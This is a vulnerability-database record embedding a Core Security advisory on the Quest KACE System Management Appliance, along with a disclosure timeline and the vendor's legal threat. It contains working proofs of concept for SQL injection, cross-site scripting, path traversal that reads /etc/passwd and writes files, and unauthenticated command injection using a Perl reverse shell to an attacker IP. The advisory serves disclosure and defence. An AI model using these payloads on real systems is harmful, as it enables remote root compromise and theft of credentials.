\n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, 
OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. 
Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 
\n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. 
\n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. 
*PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11134",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-11281",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-11134",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"id": "VAR-201805-0594",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
}
]
},
"last_update_date": "2023-12-18T12:01:57.726000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "QuestKACESystemManagementAppliance design vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/131639"
},
{
"title": "Quest KACE System Management Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81232"
},
{
"title": "lean0x2f.github.io",
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-640",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11134"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/640.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.357000",
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"date": "2018-06-29T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"date": "2018-06-29T18:50:40.227000",
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance Vulnerable to password management",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
],
"trust": 0.6
}
}
VAR-201805-0598
Vulnerability from variot - Updated: 2023-12-18 12:01. The '/common/download_agent_installer.php' script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system. Quest KACE Systems Management Appliance therefore contains a command injection vulnerability reachable without authentication; a remote attacker may obtain or alter information and disrupt service operation (DoS). Quest KACE System Management Appliance provides comprehensive system management for all network-connected devices. A command injection vulnerability exists in the '/common/download_agent_installer.php' script in Quest KACE System Management Appliance 8.0.318. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
- Quest KACE System Management Appliance 8.0 (Build 8.0.318). Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate their privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities that would allow an attacker to read, write and delete arbitrary files (7.10, 7.11).
7.1. Unauthenticated command injection in download_agent_installer.php
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible by anonymous users; the Organization ID and Agent version parameters it receives are used to build an operating-system command (see below).
The script receives the following parameters via the GET method:
- platform: the platform for which the agent is going to be installed
- serv: SHA256 hash of a fixed value that depends on each appliance
- orgid: Organization ID
- version: version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/-----
GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1
Host: Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
-----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection in ajax_email_connection_test.php
[CVE-2018-11139] The 'TEST_SERVER' parameter of the '/common/ajax_email_connection_test.php' script is passed to an operating-system command without sanitization. Unlike 7.1, reaching this script requires a valid session cookie.
The following proof of concept executes a reverse shell:
/-----
POST /common/ajax_email_connection_test.php HTTP/1.1
Host: [ServerIP]
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 416
Cookie: [Cookie]
Connection: close
